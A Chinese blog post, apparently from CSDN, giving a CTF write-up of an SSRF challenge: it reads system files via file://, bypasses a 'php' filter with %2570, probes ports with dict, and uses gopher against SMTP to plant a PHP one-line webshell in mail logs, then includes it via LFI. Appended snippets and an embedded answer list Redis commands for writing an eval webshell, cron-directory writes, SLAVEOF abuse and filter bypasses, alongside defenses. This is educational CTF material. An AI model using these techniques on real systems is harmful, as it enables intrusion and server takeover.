CTF gopher协议

最新推荐文章于 2025-09-09 07:53:36 发布
原创 最新推荐文章于 2025-09-09 07:53:36 发布 · 7.7k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文通过实战案例,展示了如何利用SSRF漏洞和Gopher协议进行渗透测试,包括读取敏感文件、探测内网服务及利用SMTP服务反弹Shell的过程。文章深入分析了利用不同协议进行攻击的方法,并给出了具体的代码实现。

0x01 例题

这儿举例安恒的一道月题

tips:利用ssrf,gopher打内网

0x02 贴出代码

<?php
highlight_file(__FILE__);
$x = $_GET['x'];
$pos = strpos($x,"php");
if($pos){
        exit("denied");
}
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$x");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($ch);
echo $result;

0x03分析过程

首先x我们可以控制,
x可利用的协议有gopherdicthttphttpsfile
file协议可以用于查看文件
dict协议可以用于刺探端口
gopher协议支持GET&POST请求,常用于攻击内网ftpredistelnetsmtp等服务,还可以利用gopher协议访问redis反弹shell

首先我们利用file读取文件

先上脚本扫描一下目录,得到flag.php
一般我们还可以读取/etc/hosts/etc/passwd~/.bash_history等文件查看线索

但是代码中有strpos的限制(利用%2570绕过)

最后我们读取/var/www/html/flag.php时发现线索
在这里插入图片描述
继续读取/etc/hosts得到一个内网地址
在这里插入图片描述
这儿我们得到内网段,我们可以继续扫描,发现只有172.18.0.1|2|3可以访问。
http://101.71.29.5:10012/?x=http://172.18.0.2的返回结果如下图,存在LFI漏洞。
在这里插入图片描述
这只是80端口的结果,接下来我们看看其他端口的开放情况,可以看到,25端口也开放了,25对应的就是smtp服务。
在这里插入图片描述于是可以联想到利用gopher协议打smtp,然后再结合之前发现的LFI漏洞,得出这样的思路
利用gopher打smtp,在日志文件中留下一句话木马,然后用LFI包含日志文件获取webshell
思路清晰了后,就开始执行了,先用gopherus脚本生成payloadgopherus地址:https://github.com/tarunkant/Gopherus,里面有详细用法。


在这里插入图片描述

将127.0.0.1:25改为内网地址,然后url编码发送过去

然后我们利用包含日志文件
于是我们现在可以去找smtp的日志文件位置了,一般来讲linux中的邮件日志文件路径为

  • /var/log/maillog
  • /var/log/mail.log
  • /var/adm/maillog
  • /var/adm/syslog/mail.log

在这里插入图片描述
然后我们直接连接菜刀查看flag

0x04 总结

1、https://bugs.php.net这是一个包含php漏洞的网址

例如我们可以利用谷歌语法搜索
site: [https://bugs.php.net](https://bugs.php.net) strpos

2、ssrf一般先探测主机,然后探测端口,找到对应服务,再利用相应的payload

0x05 链接

复现的题目的时候,环境关了,所以直接用了另外一名师傅的writeup图片,这儿贴出链接,见谅!
链接

【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 1万+
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
【网络安全 | HTTP】 gopher协议原理、语法及利用总结
等风来
08-01 1万+
Gopher协议是一种早期的互联网协议,用于在网络上获取文本信息。它于1991年提出,旨在提供一种简单、高效的方式来浏览和访问文件。Gopher协议使用类似于文件系统的层次结构来组织数据,其中每个项目都有一个唯一的标识符。通过Gopher客户端软件,用户可以浏览目录并选择下载或查看文件。Gopher服务器可以提供文本文件、图像文件、二进制文件等。与HTTP相比,Gopher协议具有更简单的设计和较少的功能。它基于传输控制协议(TCP)进行通信,默认端口号为70。
Gopher协议与ssrf
qq_44657899的博客
04-30 5033
文章目录0x01 reference和环境准备0x02 使用gopher构造GET、POST请求构造GET请求Gopher发送请求HTTP POST请求:0x03 CTF实战 0x01 reference和环境准备 参考 Gopher协议在SSRF漏洞中的深入研究(附视频讲解) 参考 Gopher协议与redis未授权访问 Gopher协议格式: URL:gopher://<host>:<port>/<gopher-path>_后接TCP数据流 gopher的默认端
CTFHub SSRF通关笔记4-2:Gopher 上传文件 原理详解与渗透实战(python脚本法)
最新发布
mooyuan的网络安全博客
09-09 1055
本文通过python脚本法利Gopher协议CTFHub靶场的SSRF文件上传关卡进行渗透实战。首先讲解了Gopher协议的基本概念、语法格式及GET/POST请求构造方法,重点说明如何通过URL编码构建攻击载荷。随后通过CTF靶场演示渗透流程:分析存在IP限制的flag.php文件上传功能,修改HTML添加提交按钮,抓取文件上传请求报文,使用Python脚本对请求进行编码构造Gopher攻击URL。最终通过两种方式成功利用Gopher协议发送伪造的本地POST请求绕过限制,获取到环境变量中的flag值。
ctfhub-web-ssrf-POST请求
m0_52484587的博客
08-29 1207
在使用 Gopher协议发送 POST请求包时,Host、Content-Type和Content-Length请求头是必不可少的,但在 GET请求中可以没有。在向服务器发送请求时,首先浏览器会进行一次 URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次 URL解码。这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年。我们尝试通过file协议读取index.php 和flag.php的页面源码。发送POST请求,得到flag。
mysql is fashion ctf_从一道CTF题目看Gopher攻击MySql
weixin_29032337的博客
01-20 296
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
CTFHUB--SRRF(上)--gopher协议
qq_75120258的博客
03-28 1335
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
SSRF服务端请求&Gopher协议&白盒测试
2301_81155391的博客
12-29 1463
是什么SSRF?这个简单点说就是 服务端的请求伪造 就是这个如果是个 请求图片的网站 他的目的是请求外部其他网站的 图片 但是 SSRF指的是让他请求本地的图片 再展示出来 请求的是他的服务器上的图片SSRF(Server-Side Request Forgery:服务器端请求伪造)一种由攻击者构造形成由服务端发起请求的一个安全漏洞;一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
ctfhub-web-ssrf-post请求 解题思路(gopher协议应用)
2301_80307383的博客
07-23 889
但是使用bp的url编码得不到本题flag,只有用脚本的url编码才能得到flag(不理解,望有高人指点)1.打开题目首先输入url=127.0.0.1/flag.php进行测试,查看源码后发现给出一个key值。构造gopher协议,使得在index页面提交带key的post请求以得到flag,注意换行符。将key值输入该页面给出的输入框后,提示只能从127.0.0.1进行访问。2.接着访问flag.php,index.php的源代码。在cmd里运行,位置自选,我的在桌面。构造好之后放入bp编码。
ctf-web: Gopher协议利用 -- GHCTF Goph3rrr
weixin_59166557的博客
03-11 611
Gopher是一种面向文档的分布式信息检索协议,诞生于1991年,比万维网(WWW)出现还早。它曾经用于在互联网中以层级目录的形式组织和访问文档。Gopher协议的URL以。
Gopher协议
qq_43665434的博客
03-26 4740
Gopher协议 本文参考Margin大佬文章 什么是Gopher协议? 定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它; gopher协议支持发出GET、POST请求:可以先截获get请
gopher协议
weixin_52963334的博客
09-17 1269
Gopher是Internet的一个信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求。gopher协议是ssrf利用中最强大的协议(万金油协议)。默认使用tcp70端口。gopher在各种变成语言中的使用限制。
gopher协议总结
unexpectedthing的博客
12-01 6866
定义 gopher协议是一种信息查0找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。利用此协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求。这拓宽了 SSRF 的攻击面 利用: 攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求
2021-08-16 CTFer成长之路-SSRF漏洞-Gopher协议攻击(redis)
热门推荐
时光隧道
08-16 5万+
生成反弹shell脚本 在burp中再进行一次url编码 将编码结果传入到web的url参数中,可以看到目录下生成了shell.php
从一道CTF题目看Gopher攻击MySql(转载)
qwzf
07-18 1102
转载自FreeBuf平台 作者:undef1ned 前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,解压后的目录不解析php。通过上传一个含有符号链接文件的压缩
关于gopher协议
xiaoka__的博客
11-09 1742
一、gopher协议的使用方法(注意请求开头加个_或任意字符),例如/_,不然会丢失一个字节) 使用Gopher协议发送一个请求,环境为:nc起一个监听,curl发送gopher请求 nc启动监听,监听2333端口: root@Ubuntu ~# nc -lp 2333 使用curl发送http请求,命令为 root@kali ~# curl gopher://192.168.17.129:2333/abcd 此时nc收到的消息为: root@Ubuntu ~# nc -lp 2333 bcd 可以发
[ctf学习]ssrf-gopher
小飒的博客
07-05 918
?url=127.0.0.1/flag.php 看到 这里不考虑使用file直接读取 f.php内容,尝试一下如何使用gopher 进行get传值 burp拦截 取前两句 ssrf_post 还是上面情况,如果是post Content-Length: 7是post传参的长度
gopher攻击mysql_CTFweb类型(二十七)gopher对mysql的利用及例题讲解
weixin_42462007的博客
02-05 391
本次来讲一下gopher协议在MySQL中的利用,其实CTF题目中已经有出现过了,比如说红帽杯还有CTF都有出现过,不管是像之前讲的Redis还是MySQL,就是这种协议的利用,都是有可以做转化,现在我们讲的只是一个demo,毕竟这些协议最终它的本质其实都是对MySQL,对Redis的一个使用,但是应用能够扩展成什么类型的题目,都可以在变。先讲一下对MySQL的利用:我这边创建一个demo,简单了...
gopher对mysql的利用_从一道CTF题目看Gopher攻击MySql
weixin_32394247的博客
02-23 170
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0×00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
ctf-ssrf-redis
06-14
<think>我们正在讨论CTF比赛中与SSRF(Server-SideRequestForgery)和Redis相关的攻击或防御技巧。根据提供的引用,攻击者常利用SSRF漏洞通过特定的协议(如dict或gopher)与内网的Redis服务交互,进而实现未授权访问、写入Webshell或执行其他恶意操作。以下是相关的攻击技巧和防御方法的总结:###攻击技巧1.**利用dict协议攻击Redis**(引用[1]):-通过SSRF发送dict协议的请求到Redis服务,可以执行Redis命令。-典型攻击步骤:-设置Redis的工作目录:`configsetdir/var/www/html`-设置保存的文件名:`configsetdbfilenamewebshell.php`-写入Webshell内容:`settest"<?php@eval($_POST['cmd']);?>"`(注意:这里的引号需要正确转义)-保存:`save`-这样就在Web目录下写入了webshell.php文件,攻击者可以通过蚁剑等工具连接。2.**利用gopher协议攻击Redis**(引用[2]):-gopher协议功能更强大,可以发送多行命令。-使用工具(如gopherus)生成攻击payload:-生成Redis的payload:`./gopherus.py--exploitredis`-输入要执行的PHP代码(如`<?phpeval($_POST["123"]);?>`),生成gopher链接。-由于gopher协议在传输中需要正确编码,通常需要二次URL编码。-将生成的payload通过SSRF漏洞发送,即可在目标服务器上写入Webshell。3.**绕过过滤**(引用[3]):-题目中可能过滤了`file://`、`dict`、`127.0.0.1`、`localhost`等关键词。-绕过方法:-使用IP的十进制表示(如`2130706433`代表`127.0.0.1`)或`0.0.0.0`。-使用DNS重绑定技术。-使用非标准端口或协议(如http协议访问Redis的6379端口,但Redis不支持HTTP,所以通常用gopher或dict)。-利用URL解析特性,如`http://abc@127.0.0.1`、`http://127.0.0.1:80@evil.com`等。###防御技巧1.**过滤输入**:-对用户输入的URL进行严格检查,禁止访问内网IP和特殊协议(如dict、gopher)。-使用正则表达式过滤,但要注意绕过技巧(如IP的多种表示形式)。2.**限制协议**:-只允许HTTP/HTTPS协议,禁止其他协议。3.**网络隔离**:-将关键服务(如Redis)置于内网,并设置防火墙规则,禁止外部访问。4.**Redis安全配置**:-为Redis设置强密码认证。-限制Redis的绑定IP(不要绑定在0.0.0.0)。-以低权限用户运行Redis,并限制其文件写入权限。5.**使用SSRF防护机制**:-在服务端设置请求的目标地址白名单。-使用DNS解析并验证目标IP是否在允许范围内。###示例:攻击Redis写入Webshell假设存在SSRF漏洞,且内网Redis无认证,攻击者可以构造如下dict协议的请求(注意空格和换行需要正确编码):```dict://127.0.0.1:6379/configsetdir/var/www/htmldict://127.0.0.1:6379/configsetdbfilenameshell.phpdict://127.0.0.1:6379/settest"<?php@eval($_POST['cmd']);?>"dict://127.0.0.1:6379/save```但实际中,由于dict协议一次只能发送一个命令,且需要多个请求,因此通常使用gopher协议在一个请求中发送多个命令。###注意事项-在CTF中,Redis可能运行在非默认端口或需要绕过过滤。-写入Webshell的路径需要可写,且Web服务器能够解析。§§相关问题§§1.如何防御SSRF攻击Redis?2.在CTF中,如果过滤了dict和gopher协议,还有哪些方法可以利用SSRF攻击Redis?3.Redis除了写入Webshell,还可以利用SSRF进行哪些攻击?</think>### CTF SSRF Redis攻击与防御技巧 在CTF比赛中,SSRF(服务端请求伪造)结合Redis的攻击是常见题型。以下是关键技巧总结: --- #### **攻击技巧(利用SSRF操作Redis)** 1. **协议利用** - **dict协议**:直接发送Redis命令(需URL编码) ```http dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html ``` - **gopher协议**(更强大):支持多行命令,常用工具`gopherus`生成Payload ```python # 生成Payload示例(自动处理换行编码) ./gopherus.py --exploit redis ``` 2. **写入Webshell** - 经典四步操作: ```redis CONFIG SET dir /var/www/html # 设置保存目录 CONFIG SET dbfilename shell.php # 设置文件名 SET payload "<?php eval($_POST['cmd']);?>" # 写入恶意代码 SAVE # 保存到文件 ``` - 需注意特殊字符转义(如`<`需转为`<`) 3. **绕过过滤** - **IP绕过**:用`0.0.0.0`、`2130706433`(127.0.0.1的整数形式)或`localhost`替代 - **协议绕过**:若过滤`dict/gopher`,尝试`http://0.0.0.0:6379/?`(需Redis支持HTTP) - **分块编码**:对Payload二次URL编码(引用[2]示例) 4. **其他利用方式** - 写计划任务:`CONFIG SET dir /var/spool/cron/` - 主从复制攻击:通过`SLAVEOF`命令控制Redis从恶意服务器加载模块 - 读取敏感文件:`CONFIG GET *`获取Redis配置 --- #### **防御技巧** 1. **输入过滤** - 协议黑名单:禁用`file://`、`dict://`、`gopher://` - IP/域名限制:过滤`127.0.0.1`、`localhost`、内网IP段 - 正则强化:检测异常路径(如`/var/spool/cron`) 2. **Redis加固** ```bash # 关键配置 bind 127.0.0.1 # 只监听本地 requirepass "强密码" # 启用认证 rename-command CONFIG "" # 禁用危险命令 ``` 3. **服务隔离** - 将Redis部署在内网,禁止公网访问 - 使用防火墙限制6379端口的来源IP 4. **权限控制** - Redis以低权限用户运行(非root) - 限制Web目录写权限(防止写Shell) --- #### **CTF实战要点** 1. **判断Redis存在**:尝试访问`http://target:6379`若返回`-ERR wrong number of arguments`则存在。 2. **编码处理**: - 使用工具(如gopherus)自动生成编码后的Payload - 二次URL编码绕过WAF(引用[2]案例) 3. **回显利用**:若命令无回显,可通过延时或DNS外带数据判断执行结果。 > 参考案例:某CTF题通过SSRF的gopher协议发送Redis命令写入Webshell,最终用蚁剑连接获取flag(引用[2])。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值